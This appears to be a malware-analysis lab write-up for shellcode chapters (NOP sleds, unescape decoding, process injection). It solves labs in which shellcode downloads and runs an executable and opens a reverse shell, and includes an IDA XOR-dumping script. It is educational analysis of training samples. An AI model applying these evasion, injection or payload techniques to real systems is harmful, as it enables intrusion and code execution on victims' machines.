    x86/unicode_mixed          manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper          manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
    x86/xor_dynamic            normal     Dynamic key XOR Encoder

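NOP Sleds

A NOP sled (also called a NOP slide) is a long sequence of instructions that precedes the shellcode, as shown in Figure 19-3. A NOP sled is not required for shellcode to work, but it is often included in an exploit to increase the chance that the exploit succeeds. Shellcode authors do this by placing a large NOP sled immediately before the shellcode. As long as execution lands somewhere inside the sled, the shellcode will eventually run.

sled.png

Traditional NOP sleds consist of a long run of NOP (0x90) instructions, but exploit authors get creative to avoid detection. Other popular choices are the opcodes in the range 0x40 to 0x4f. These are single-byte instructions that increment or decrement the general-purpose registers. This byte range also consists only of printable ASCII characters, which is often useful: the NOP sled executes before the decoder runs, so it must pass the same filters as the rest of the shellcode.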
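From the analyst's side, long runs of these bytes are a useful hint for where shellcode may start. The sketch below scans a buffer for such runs. It is only a heuristic under stated assumptions: the function name find_nop_sleds and the default threshold of 16 bytes are arbitrary choices for this example, and because 0x40 to 0x4f are also the characters @ and A through O, ordinary uppercase text will produce false positives.

```python
# Bytes treated as sled candidates: NOP (0x90) plus the single-byte
# inc/dec register opcodes 0x40..0x4f mentioned above.
NOP_LIKE = frozenset([0x90]) | frozenset(range(0x40, 0x50))


def find_nop_sleds(data: bytes, min_len: int = 16):
    """Yield (offset, length) for each run of NOP-like bytes of at least min_len."""
    start = None
    for i, b in enumerate(data):
        if b in NOP_LIKE:
            if start is None:
                start = i               # a new run begins here
        else:
            if start is not None and i - start >= min_len:
                yield (start, i - start)
            start = None
    # Handle a run that extends to the end of the buffer.
    if start is not None and len(data) - start >= min_len:
        yield (start, len(data) - start)


buf = b"\x00" * 4 + b"\x90" * 20 + b"\xcc" + b"ABCDEFGH" * 3 + b"\x00"
print(list(find_nop_sleds(buf)))  # [(4, 20), (25, 24)]
```

The bytes that follow a reported run are a reasonable place to start disassembling.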

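Finding Shellcode

In JavaScript

JavaScript code often uses the unescape function to convert encoded shellcode text into executable binary.

unescape treats the text %uXXYY as an encoded big-endian Unicode character, where XX and YY are hexadecimal values. On a little-endian machine (such as x86), the decoded result is the byte sequence YY XX. For example, consider the following text string:

unes.png

A % symbol that is not immediately followed by the letter u is treated as a single encoded hexadecimal byte. For example, the text string %41%42%43%44 decodes to the byte sequence 41 42 43 44.

Note: Single-byte and double-byte encodings can be mixed within the same text string. This is a very common obfuscation technique wherever JavaScript is used, including in PDF documents.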
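The decoding rules above can be reproduced outside a browser when extracting shellcode from a script. This is a minimal Python sketch, not a full reimplementation of unescape: it assumes the input consists only of %uXXXX and %XX tokens and silently skips any other characters, and the function name unescape_to_bytes is made up for this example.

```python
import re

# %uXXXX (four hex digits) or %XX (two hex digits)
_TOKEN = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")


def unescape_to_bytes(text: str) -> bytes:
    """Decode %uXXYY and %XX tokens into the bytes seen on a little-endian machine."""
    out = bytearray()
    for m in _TOKEN.finditer(text):
        if m.group(1) is not None:
            # %uXXYY: a 16-bit value stored little-endian, giving bytes YY XX
            out += int(m.group(1), 16).to_bytes(2, "little")
        else:
            # %XX: a single byte
            out.append(int(m.group(2), 16))
    return bytes(out)


print(unescape_to_bytes("%u1122%u3344").hex())  # 22114433
print(unescape_to_bytes("%41%42%43%44"))        # b'ABCD'
```

The resulting bytes can be written to a file and loaded into a tool such as shellcode_launcher.exe or scdbg.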

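In Process Injection

When analyzing malware that performs process injection, if the malware starts a remote thread without applying relocation fix-ups or resolving external dependencies, the buffer written into the other process is most likely shellcode.

Tip: the key functions for process injection are:

VirtualAllocEx
WriteProcessMemory
CreateRemoteThread

Important Opcodes

Sometimes the shellcode itself is hard to find, but the decoder that precedes it can be located by searching for the following important opcodes: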

imp_opcode.png

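Labs

Lab 19-1

Analyze the file Lab19-01.bin using shellcode_launcher.exe.

1. How is the shellcode encoded?
2. Which functions does the shellcode manually import?
3. What network host does the shellcode communicate with?
4. What filesystem residue does the shellcode leave?
5. What does the shellcode do?

Run the shellcode with scdbg: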

scdbg.exe -r -f C:\Users\doinb\Desktop\BinaryCollection\Chapter_19L\Lab19-01.bin

scdbg.png

The shellcode manually imports six functions:

LoadLibraryA()
GetSystemDirectoryA()
URLDownloadToFile()
GetCurrentProcess()
TerminateProcess()
WinExec()

The shellcode downloads http://www.practicalmalwareanalysis.com/shellcode/annoy_user.exe, saves it as c:\WINDOWS\system32\1.exe, and then executes the file.

You can also load the shellcode with a helper tool for analysis:

jmp2it: https://github.com/adamkramer/jmp2it

This will allow you to transfer EIP control to a specified offset within a file containing shellcode and then pause to support a malware analysis investigation

The file will be mapped to memory and maintain a handle, allowing shellcode to egghunt for second stage payload as would have happened in original loader

Patches / self modifications are dynamically written to jmp2it-flypaper.out

Usage: jmp2it.exe [file containing shellcode] [file offset to transfer EIP to]

Example: jmp2it.exe malware.doc 0x15C

Explanation: The file will be mapped and code at 0x15C will immediately run

Example: jmp2it.exe malware.doc 0x15C pause

Explanation: As above, with JMP SHORT 0xFE inserted pre-offset causing loop

Example: jmp2it.exe malware.doc 0x15C addhandle another.doc pause

Explanation: As above, but will create additional handle to specified file

Optional extras (to be added after first two parameters):

addhandle [path to file] - Create an arbitrary handle to a specified file

Only one of the following two may be used:

pause - Inserts JMP SHORT 0xFE just before offset causing infinite loop

pause_int3 - Inserts INT3 just before offset [launch via debugger!]

Note: In these cases, you will be presented with step by step instructions on what you need to do inside a debugger to resume the analysis

jmp2it.exe C:\Users\doinb\Desktop\BinaryCollection\Chapter_19L\Lab19-01.bin 0x0 pause

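Once decoding finishes, execution enters the decoded payload at offset 0x224.

0x224.png

At offset 0x2bf, a call/pop pair places the address of the URL in the ebx register.

ebx.png

The function at 0x29E locates the target functions through the PEB.

findkernel32.png

I will not go further with the manual analysis here. scdbg can dump the runtime memory, which makes the analysis easier:

scdbg.exe /f C:\Users\doinb\Desktop\BinaryCollection\Chapter_19L\Lab19-01.bin -r -d

scdbg automatically detects that the shellcode decodes itself, and the dump succeeds.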

11111.png

Lab 19-2

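The file Lab19-02.exe contains a piece of shellcode that is injected into another process and run. Analyze this file.

1. What process is the shellcode injected into?
2. Where is the shellcode located?
3. How is the shellcode encoded?
4. Which functions does the shellcode manually import?
5. What network hosts does the shellcode communicate with?
6. What does the shellcode do?

Running Lab19-02.exe directly prints process information and opens a browser.

19-02.png

It accesses the registry; the registry value it queries identifies the default browser.

hkcr.png

ie.png

Analysis in IDA shows that the sample performs process injection. The shellcode is located at 0x407030 and is encoded. To debug it, open the sample in x32dbg, press F9, and then set EIP to the shellcode entry point at 0x407030.

eippp.png

The three instructions at 3b through 3e form the decoding loop.

encode.png

The following script dumps the decoded shellcode: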

import idc

def main():
    begin = 0x407048   # start of the encoded payload, right after the decoder stub
    size = 0x18f       # number of encoded bytes
    key = 0xe7         # single-byte XOR key used by the decoding loop
    decoded = bytearray()
    for i in range(size):
        # idc.get_wide_byte replaces the old idc.Byte, which newer IDA
        # versions (7.4 and later) no longer provide; on older versions
        # use idc.Byte instead.
        decoded.append(idc.get_wide_byte(begin + i) ^ key)
    print('collect over')
    out_path = "lab19-02.bin"
    with open(out_path, 'wb') as fw:
        fw.write(decoded)
    print('write over')

if __name__ == '__main__':
    main()

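Analysis shows that this is a reverse shell; the host and port are shown below. I forgot to take a screenshot of the original values. You can patch the host to your own IP address, listen on port 13330, and wait for the reverse shell to connect back.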

rv_shell.png

huilian.png

Lab 19-3

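Analyze the file Lab19-03.pdf. If you get stuck and cannot find the shellcode, skip the first half of this lab and analyze the file Lab19-03_sc.bin using shellcode_launcher.exe.

1. What exploit is used in this PDF?
2. How is the shellcode encoded?
3. Which functions does the shellcode manually import?
4. What filesystem residue does the shellcode leave?
5. What does the shellcode do?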
